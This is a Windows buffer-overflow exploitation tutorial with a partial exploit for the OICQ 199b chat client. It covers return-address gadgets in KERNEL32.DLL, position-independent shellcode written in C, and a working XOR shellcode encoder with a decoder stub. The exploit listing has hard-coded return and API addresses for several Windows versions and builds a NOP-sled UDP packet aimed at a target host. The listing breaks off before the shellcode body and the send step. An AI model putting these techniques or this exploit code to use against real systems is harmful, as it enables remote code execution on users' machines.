Overflow programming skills in WINDOWS

Author: Yuan Ge
 
After reading a number of overflow programs for WINDOWS, I felt that they were neither uniform nor complete, so I decided to write up a relatively unified method and try to solve some of the problems.
 
1. The jmp esp problem.
Code from KERNEL32.DLL is used to keep the return address consistent, because at least on the same system the load address of the KERNEL32.DLL module does not change. Other modules may move with the installation environment of the application software, and since KERNEL32.DLL is loaded comparatively early, the load addresses of the modules that follow it shift whenever an earlier module changes. KERNEL32.DLL is therefore the relatively unified choice (that is, unified across different versions of the same system).
The problem that a jmp esp (FF E4) sequence cannot be found is solved by using
push esp (54)
....
ret (C3)
or
push esp (54)
....
ret 00XX (C2 XX 00) (ret num; NUM must not be too large, so it is limited to NUM = 00XX)
instead. Such sequences can be found in large numbers. "...." stands for a few arbitrary instructions that do not affect the result; they must not modify ESP or overwrite the value just pushed. For example, one can find the sequence:
push esp
and al, 08
ret 10
Note that ret 00XX pops the return address and then adds 00XX to ESP, so execution starts at the old ESP (the payload) while ESP itself now points 4 + 00XX bytes into it; the shellcode should first move ESP away, or begin with enough NOPs, so that its own pushes do not overwrite bytes it has yet to execute.
Use an address that is usable in as many module builds as possible, because even builds of the same version can differ considerably.
Because the module load addresses of 9X and the NT systems are very different, this method cannot cover both in a unified way. I have also seen that WINNT and WIN2000 actually have different KERNEL32.DLL load addresses.... For an overflow in a specific program, one can try to find a jmp esp in the program's own image, but that address is usually of the form 0X00XXXXXX (it contains a zero byte), which causes problems of its own. Could the program first identify which system it is attacking? The program below simply selects the address with a macro.
 
2. Solving the SHELLCODE compilation problem.
In many programs the SHELLCODE is written first and then pasted in as a string of the form "\xAA\xBB...". That form is not easy to modify, and it is also hard to see what the SHELLCODE does. The idea here is to write the SHELLCODE together with the overflow program, which requires a little care in how the SHELLCODE is written.
The SHELLCODE must be relocatable code, that is, the whole block can be moved to another address and still run. To reduce incompatibilities, function addresses are obtained through LOADLIBRARY and GETPROCADDRESS, so the SHELLCODE depends only on those two addresses. In fact these two addresses can also be found in memory, by locating the KERNEL32.DLL module and then reading the addresses from its export table. That leaves the jmp esp address as the only thing that is not unified across WINNT, WIN2000 and WIN9X.
The SHELLCODE prototype is roughly shown in the program. There are several problems:
1. Determining the address of the SHELLCODE function's code, so that jmp shellcode can be pointed directly at it. There should be a way to get it directly; the program below takes the function's address and, if it is an E9 jump thunk, follows the jump to the real body.
2. When the SHELLCODE is compiled from C there is often a call to _chkesp in it. Either write the SHELLCODE in assembly, or find the call _chkesp instruction and overwrite it with NOPs.
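The two fix-ups listed as problems 1 and 2, as an added example that is not code from the article (the article's own program does the first with inline assembly): following an E9 jmp rel32 thunk to the function body, and overwriting the call _chkesp that a debug build emits with NOPs. The byte buffers and virtual addresses are constructed for the example.

```c
/* Added example (not the article's own code): the two fix-ups section 2 needs
 * when the shellcode is compiled as an ordinary C function.
 * 1. resolve_jmp_thunk: with MSVC incremental linking a function symbol can
 *    point at a 5-byte "jmp rel32" (E9 xx xx xx xx) thunk rather than at the
 *    body; the body is at thunk + 5 + rel32.  This is what the article's
 *    program computes with inline asm for _chkesp and shellcodefnlock.
 * 2. nop_out_calls: a debug build ends every function with "call _chkesp"
 *    (E8 rel32); the call is not position independent and must be replaced
 *    with NOPs before the function body is shipped as shellcode.
 * The byte buffers and virtual addresses below are constructed for the
 * example (32-bit x86 encodings); nothing is executed. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Little-endian rel32 at p. */
static int32_t rel32_at(const uint8_t *p) {
    return (int32_t)((uint32_t)p[0] | ((uint32_t)p[1] << 8) |
                     ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24));
}

/* sym holds the bytes at virtual address sym_va.  If they start with E9 rel32,
 * return the jump target; otherwise sym_va itself (no thunk, symbol is the body). */
uint32_t resolve_jmp_thunk(const uint8_t *sym, uint32_t sym_va) {
    if (sym[0] == 0xe9)
        return sym_va + 5u + (uint32_t)rel32_at(sym + 1);
    return sym_va;
}

/* Overwrite every "E8 rel32" in code (mapped at code_va) whose destination is
 * target_va with five 0x90 bytes.  Returns how many calls were patched. */
size_t nop_out_calls(uint8_t *code, size_t len, uint32_t code_va, uint32_t target_va) {
    size_t i, n = 0;
    for (i = 0; i + 5 <= len; i++) {
        uint32_t dest;
        if (code[i] != 0xe8) continue;
        dest = code_va + (uint32_t)i + 5u + (uint32_t)rel32_at(code + i + 1);
        if (dest != target_va) continue;        /* a call to something else: keep it */
        memset(code + i, 0x90, 5);
        n++;
        i += 4;
    }
    return n;
}

/* Constructed layout:
 *   0x00401000  shellcode_thunk : jmp 0x00401200             (E9 FB 01 00 00)
 *   0x00401200  shellcode_body  : push ebp ; mov ebp,esp ;
 *                                 call 0x00402000 (_chkesp) ; call 0x00401300 ;
 *                                 pop ebp ; ret
 *   0x00401800  chkesp_thunk    : jmp 0x00402000             (E9 FB 07 00 00) */
static const uint8_t shellcode_thunk[] = { 0xe9, 0xfb, 0x01, 0x00, 0x00 };
static const uint8_t chkesp_thunk[]    = { 0xe9, 0xfb, 0x07, 0x00, 0x00 };
uint8_t shellcode_body[] = {
    0x55,                           /* push ebp                    */
    0x8b, 0xec,                     /* mov ebp,esp                 */
    0xe8, 0xf8, 0x0d, 0x00, 0x00,   /* call _chkesp (0x00402000)   */
    0xe8, 0xf3, 0x00, 0x00, 0x00,   /* call 0x00401300, unrelated  */
    0x5d,                           /* pop ebp                     */
    0xc3                            /* ret                         */
};

/* Resolve both thunks, then strip the _chkesp call from the body.
 * Returns the number of calls removed (1 for the constructed body). */
size_t demo_cleanchkesp(void) {
    uint32_t body_va   = resolve_jmp_thunk(shellcode_thunk, 0x00401000u);
    uint32_t chkesp_va = resolve_jmp_thunk(chkesp_thunk, 0x00401800u);
    return nop_out_calls(shellcode_body, sizeof shellcode_body, body_va, chkesp_va);
}

int main(void) {
    size_t removed = demo_cleanchkesp(), i;
    printf("removed %u call(s); body:", (unsigned)removed);
    for (i = 0; i < sizeof shellcode_body; i++) printf(" %02x", shellcode_body[i]);
    printf("\n");
    return 0;
}
```

Both routines compute a destination as next-instruction address plus the signed rel32, so they work unchanged when the target lies below the call. Only calls whose destination equals the resolved _chkesp address are patched; the unrelated call in the body is kept, and in real shellcode any such call would still have to be removed or made position independent by other means.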
 
3. The characters allowed in the SHELLCODE are usually restricted, so the SHELLCODE is encoded. A short piece of code placed in front of it decodes the SHELLCODE at run time; that decoder is written to comply with the restrictions, which relaxes the requirements on the SHELLCODE itself. For a different set of restrictions it is mainly this code segment that has to be rewritten.
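An added example, not code from the article, of the encoding side of this idea: choose a one-byte XOR key that leaves neither the key nor any encoded byte in the forbidden set, prepend a conventional call/pop XOR decoder, and verify the finished payload and the round trip. The sample shellcode bytes, the forbidden set {0x00, 0x1f} (the C string terminator, and the 0x1f field separator seen in the OICQ header later on this page) and the decoder stub are all constructed for the example.

```c
/* Added example, not the article's code: XOR-encode shellcode with a key that
 * avoids a forbidden byte set and prepend a call/pop decoder.  sample_sc,
 * bad_bytes {0x00,0x1f} and the stub are constructed for this example. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define NO_KEY   (-1)
#define STUB_LEN 20

/* Constructed sample: x86 instructions that contain both forbidden bytes. */
static const uint8_t sample_sc[] = {
    0x33, 0xc0,                    /* xor eax,eax               */
    0x50,                          /* push eax                  */
    0x68, 0x4f, 0x4b, 0x21, 0x00,  /* push "OK!\0"   (has 0x00) */
    0x8b, 0xc4,                    /* mov eax,esp               */
    0x6a, 0x1f,                    /* push 1Fh       (has 0x1f) */
    0x6a, 0x01,                    /* push 1                    */
    0x50,                          /* push eax                  */
    0xff, 0xd0                     /* call eax                  */
};
static const uint8_t bad_bytes[] = { 0x00, 0x1f };

/* 20-byte x86 decoder; bytes 6 (LEN) and 9 (KEY) are patched by build_payload:
 *   jmp short L2 / L1: pop esi ; xor ecx,ecx ; mov cl,LEN
 *   L0: xor byte [esi],KEY ; inc esi ; loop L0 ; jmp short payload
 *   L2: call L1          (the call pushes the payload address, pop esi takes it) */
static const uint8_t stub[STUB_LEN] = {
    0xeb, 0x0d, 0x5e, 0x31, 0xc9, 0xb1, 0x00, 0x80, 0x36, 0x00,
    0x46, 0xe2, 0xfa, 0xeb, 0x05, 0xe8, 0xee, 0xff, 0xff, 0xff
};

static int is_bad(uint8_t b, const uint8_t *bad, size_t nbad) {
    size_t i;
    for (i = 0; i < nbad; i++) if (bad[i] == b) return 1;
    return 0;
}

/* 1 if no byte of buf is in the forbidden set. */
int is_clean(const uint8_t *buf, size_t len, const uint8_t *bad, size_t nbad) {
    size_t i;
    for (i = 0; i < len; i++) if (is_bad(buf[i], bad, nbad)) return 0;
    return 1;
}

/* Smallest key in 1..255 such that the key and every in[i]^key are allowed. */
int find_xor_key(const uint8_t *in, size_t len, const uint8_t *bad, size_t nbad) {
    int k;
    for (k = 1; k < 256; k++) {
        size_t i;
        if (is_bad((uint8_t)k, bad, nbad)) continue;
        for (i = 0; i < len && !is_bad((uint8_t)(in[i] ^ k), bad, nbad); i++) ;
        if (i == len) return k;
    }
    return NO_KEY;
}

/* out <- stub + encoded shellcode (out holds STUB_LEN+len bytes).  Returns the
 * total length, or 0 if no key works, len is 0 or >255 (mov cl), or the result
 * still contains a forbidden byte (LEN itself could be one: pad the shellcode). */
size_t build_payload(const uint8_t *sc, size_t len, const uint8_t *bad, size_t nbad,
                     uint8_t *out, int *key_out) {
    int k = find_xor_key(sc, len, bad, nbad);
    size_t i;
    if (k == NO_KEY || len == 0 || len > 255) return 0;
    memcpy(out, stub, STUB_LEN);
    out[6] = (uint8_t)len;                        /* mov cl,LEN    */
    out[9] = (uint8_t)k;                          /* xor [esi],KEY */
    for (i = 0; i < len; i++) out[STUB_LEN + i] = sc[i] ^ (uint8_t)k;
    if (!is_clean(out, STUB_LEN + len, bad, nbad)) return 0;
    if (key_out) *key_out = k;
    return STUB_LEN + len;
}

uint8_t payload[256];
int payload_key = NO_KEY;

size_t demo_build(void) {
    return build_payload(sample_sc, sizeof sample_sc, bad_bytes, sizeof bad_bytes,
                         payload, &payload_key);
}

/* Redo in C what the stub does at run time; 1 if sample_sc comes back. */
int demo_roundtrip(void) {
    uint8_t tmp[256];
    size_t n = demo_build(), i;
    if (n == 0) return 0;
    for (i = 0; i < n - STUB_LEN; i++) tmp[i] = payload[STUB_LEN + i] ^ (uint8_t)payload_key;
    return memcmp(tmp, sample_sc, n - STUB_LEN) == 0;
}

int main(void) {
    size_t n = demo_build(), i;
    printf("key=%02x total=%u roundtrip=%d\n", payload_key, (unsigned)n, demo_roundtrip());
    for (i = 0; i < n; i++) printf("\\x%02x", payload[i]);
    printf("\n");
    return 0;
}
```

The decoder hard-codes a call rel32 (three 0xff bytes) and a mov cl, so a restriction set that forbids 0xff, or a payload longer than 255 bytes, needs a different stub; that is the "rewrite this code segment" case the text refers to. The stub also writes into its own payload, which is fine on the writable stack these overflows land on.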
 

/* oicq 199b build 0220 overflow program
   copy by yuange <yuange@163.net> 2000.04.18
   The new version 0410 has a heap overflow that can be exploited, but cannot execute SHELLCODE.
*/

#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "wsock32.lib")   /* Winsock 1.1 library matching winsock.h */

#define NUKEWIN2000
//#define NUKEWIN9X

#ifdef NUKEWIN2000
#define RETEIPADDR eipwin2000
#define LoadLibraryfnaddress 0x77e78023      // 0x77E60000+0x00018023 LoadLibrary
#define GetProcAddressfnaddress 0x77e7564b   // 0X77E60000+0x0001564B GetProcAddress
#else
#ifdef NUKEWIN9X
#define RETEIPADDR eipwin9x
#define LoadLibraryfnaddress 0xbff77750      // 0xbff70000+0x00007750 LoadLibrary
#define GetProcAddressfnaddress 0xbff76e28   // 0xbff70000+0x00006e28 GetProcAddress
#else
#define RETEIPADDR eipwinnt
#define LoadLibraryfnaddress 0x77EE391A      // 0x77ED0000+0x0001391A LoadLibrary
#define GetProcAddressfnaddress 0x77eE4111   // 0x77ED0000+0x00014111 GetProcAddress
#endif
#endif

#define NOPCODE 0x90
#define BUFFSIZE 0x2000
#define OICQPORT 4000
#define OICQOVERADD (7+0x41C)
#define OVERADD OICQOVERADD
#define STR0 0
#define STR1 11
#define STR2 23
#define STR3 33
#define STR4 39
#define STR5 51

void shellcodefnlock();
void shellcodefn();
void cleanchkesp(char *fnadd, char *shellbuff, char *chkespadd, int len);
void __cdecl _chkesp(void);   /* MSVC debug-build stack check routine, supplied by the CRT */

int main(int argc, char **argv)
{
    char *server;
    /* DLL and function names for the shellcode's LoadLibrary/GetProcAddress calls */
    char *str = "user32.dll" "\x0" "MessageBoxA" "\x0" "secuess" "\x0" "OK!" "\x0" "msvcrtd.dll" "\x0" "exit" "\x0";
    char buff1[] = "\x02\x01\x07\x00\x78\x11\x22\x33\x33\x33\x33\x33\x1f\x30\x1f\x37\x35\x1f" "2000-4-10" "\x1f" "12:00:00" "\x1f";
    /* oicq udp head */

    // 0x77ed0000+0x1ddd4 kernel32.dll // push esp // and al,08 // ret 0c
    char eipwinnt[] = "\xd4\xdd\xee\x77";      // 0x77ed0000+0x0001ddd4

    char eipwin2000[] = "\xea\x17\xe8\x77";    // 0x77e60000+0x000217ea
    // kernel32.dll // push esp // and al,08 // ret 0c

    // 0x77e2e32a user32.dll JMP ESP
    char eip2win2000[] = "\x2a\xe3\xe2\x77";   // 0x77df0000+0x0003e32a
    char eipwin9x[] = "\xd9\x6a\xf7\xbf";      // 0xbff70000+0x00006ad9
    // kernel32.dll 4.10.2184 0xbff70000+0x00006ad9
    // push esp // and al,0x10; // ret 0x10;

    char buff[BUFFSIZE];
    char shellcodebuff[0x1000];
    struct sockaddr_in s_in2, s_in3;
    struct hostent *he;
    char *shellcodefnadd, *chkespadd;
    unsigned int sendpacketlong;
    unsigned int i, j, k;
    unsigned char temp;
    int fd;
    u_short port, port1;
    SOCKET d_ip;
    WSADATA wsaData;

    int result = WSAStartup(MAKEWORD(1, 1), &wsaData);
    if (result != 0) {
        fprintf(stderr, "Your computer was not connected "
                        "to the Internet at the time that "
                        "this program was launched, or you "
                        "do not have a 32-bit "
                        "connection to the Internet.\n");
        exit(1);
    }

    if (argc < 2)
    {
        WSACleanup();
        fprintf(stderr, "nuke oicq. copy by yuange 2000.4.1. wellcome to my homepage http://yuange.yeah.net .\n");
        fprintf(stderr, "usage: %s <server> [port]\n", argv[0]);
        exit(1);
    }
    else server = argv[1];

    d_ip = inet_addr(server);
    if (d_ip == -1) {
        he = gethostbyname(server);
        if (!he)
        {
            WSACleanup();
            printf("Cant get the ip of %s!\n", server);
            exit(1);
        }
        else memcpy(&d_ip, he->h_addr, 4);
    }
    if (argc > 2) port = atoi(argv[2]);
    else port = OICQPORT;
    if (port == 0) port = OICQPORT;

    fd = socket(AF_INET, SOCK_DGRAM, 0);
    i = 8000;   /* receive timeout in milliseconds */
    setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (const char *)&i, sizeof(i));
    s_in2.sin_family = AF_INET;
    if (argc > 3) port1 = atoi(argv[3]);
    else port1 = OICQPORT;
    if (port1 == 0) port1 = OICQPORT;
    s_in2.sin_port = htons(port1);
    s_in2.sin_addr.s_addr = 0;

    s_in3.sin_family = AF_INET;
    s_in3.sin_port = htons(port);
    s_in3.sin_addr.s_addr = d_ip;
    bind(fd, (const struct sockaddr FAR *)&s_in2, sizeof(struct sockaddr_in));
    printf("nuke ip: %s port %d\n", inet_ntoa(s_in3.sin_addr), htons(s_in3.sin_port));

    memset(buff, NOPCODE, BUFFSIZE);   /* NOP-filled packet, OICQ header in front */
    memcpy(buff, buff1, 37);

    /* Force the compiler to emit a real call to _chkesp so its address can be taken below */
    _asm {
        mov ESI, ESP
        cmp ESI, ESP
    }
    _chkesp();
    chkespadd = (char *)_chkesp;
    temp = *chkespadd;
    if (temp == 0xe9) {            /* E9 = jmp rel32: the symbol is an incremental-link thunk, follow it */
        ++chkespadd;
        //(int *)i=(int *)*chkespadd;
        _asm {
            mov EDI, dword ptr [chkespadd]
            mov EDI, [EDI]
            mov i, EDI
        }
        chkespadd += i;
        chkespadd += 4;
    }

    shellcodefnadd = (char *)shellcodefnlock;
    temp = *shellcodefnadd;
    if (temp == 0xe9) {            /* same thunk handling for the shellcode function */
        ++shellcodefnadd;
        //(int *)k=(int *)*shellcodefnadd;
        _asm {
            mov EDI, dword ptr [shellcodefnadd]
            mov EDI, [EDI]
            mov k, EDI
        }
        shellcodefnadd += k;

        /* The listing on the source page ends here; shellcodefnlock, shellcodefn,
           cleanchkesp and the packet send are not reproduced. */
